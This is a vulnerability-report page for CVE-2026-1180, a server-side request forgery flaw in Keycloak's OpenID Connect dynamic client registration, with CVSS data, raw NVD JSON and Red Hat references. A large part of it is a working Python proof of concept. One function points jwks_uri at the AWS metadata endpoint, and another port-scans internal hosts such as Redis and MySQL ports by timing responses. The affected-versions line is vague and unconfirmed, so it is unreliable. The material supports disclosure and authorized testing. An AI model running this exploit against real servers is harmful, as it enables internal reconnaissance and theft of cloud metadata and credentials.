Security Vulnerability Report
中文
CVE-2026-1180 CVSS 5.8 MEDIUM

CVE-2026-1180

Published: 2026-01-20 13:16:03
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A flaw was identified in Keycloak’s OpenID Connect Dynamic Client Registration feature when clients authenticate using private_key_jwt. The issue allows a client to specify an arbitrary jwks_uri, which Keycloak then retrieves without validating the destination. This enables attackers to coerce the Keycloak server into making HTTP requests to internal or restricted network resources. As a result, attackers can probe internal services and cloud metadata endpoints, creating an information disclosure and reconnaissance risk.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak < 25.x.x (需要官方确认)
Keycloak OpenID Connect Dynamic Client Registration功能所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-1180 Keycloak SSRF via jwks_uri PoC # Target: Keycloak server with Dynamic Client Registration enabled import requests import json KEYCLOAK_URL = "http://target-keycloak:8080" REALM = "master" # PoC 1: Basic SSRF test - probe internal metadata endpoint def create_malicious_client_ssrf(): """Create a client with malicious jwks_uri pointing to internal resource""" endpoint = f"{KEYCLOAK_URL}/auth/realms/{REALM}/clients-registrations/openid" # Malicious payload - target AWS metadata endpoint malicious_jwks_uri = "http://169.254.169.254/latest/meta-data/" client_data = { "client_id": "malicious_client_ssrf_test", "client_name": "SSRF Test Client", "redirect_uris": ["https://attacker.com/callback"], "jwks_uri": malicious_jwks_uri, "token_endpoint_auth_method": "private_key_jwt", "response_types": ["code"] } headers = { "Content-Type": "application/json" } try: response = requests.post(endpoint, json=client_data, headers=headers, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") return response except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None # PoC 2: Internal port scanning def scan_internal_ports(): """Scan internal services by specifying different jwks_uri ports""" internal_ips = ["10.0.0.1", "172.16.0.1", "192.168.1.1"] common_ports = [22, 80, 443, 3306, 5432, 6379, 8080, 9200] results = [] for ip in internal_ips: for port in common_ports: jwks_uri = f"http://{ip}:{port}/" client_data = { "client_id": f"scan_{ip}_{port}", "jwks_uri": jwks_uri, "token_endpoint_auth_method": "private_key_jwt" } endpoint = f"{KEYCLOAK_URL}/auth/realms/{REALM}/clients-registrations/openid" try: response = requests.post(endpoint, json=client_data, timeout=5) # Fast response may indicate open port if response.elapsed.total_seconds() < 2: results.append({"ip": ip, "port": port, "status": "possibly_open"}) print(f"[+] {ip}:{port} - Possibly open (response time: {response.elapsed.total_seconds()}s)") except requests.exceptions.Timeout: print(f"[-] {ip}:{port} - Timeout (filtered)") except Exception as e: print(f"[-] {ip}:{port} - Error: {e}") return results if __name__ == "__main__": print("[*] CVE-2026-1180 Keycloak SSRF PoC") print("[*] Testing AWS metadata endpoint SSRF...") create_malicious_client_ssrf() print("\n[*] Scanning internal services...") scan_internal_ports()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1180", "sourceIdentifier": "[email protected]", "published": "2026-01-20T13:16:03.003", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was identified in Keycloak’s OpenID Connect Dynamic Client Registration feature when clients authenticate using private_key_jwt. The issue allows a client to specify an arbitrary jwks_uri, which Keycloak then retrieves without validating the destination. This enables attackers to coerce the Keycloak server into making HTTP requests to internal or restricted network resources. As a result, attackers can probe internal services and cloud metadata endpoints, creating an information disclosure and reconnaissance risk."}, {"lang": "es", "value": "Se identificó un fallo en la característica de registro dinámico de clientes de OpenID Connect de Keycloak cuando los clientes se autentican usando private_key_jwt. El problema permite a un cliente especificar una jwks_uri arbitraria, que Keycloak luego recupera sin validar el destino. Esto permite a los atacantes forzar al servidor de Keycloak a realizar solicitudes HTTP a recursos de red internos o restringidos. Como resultado, los atacantes pueden sondear servicios internos y puntos finales de metadatos en la nube, creando un riesgo de revelación de información y reconocimiento."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-1180", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430781", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.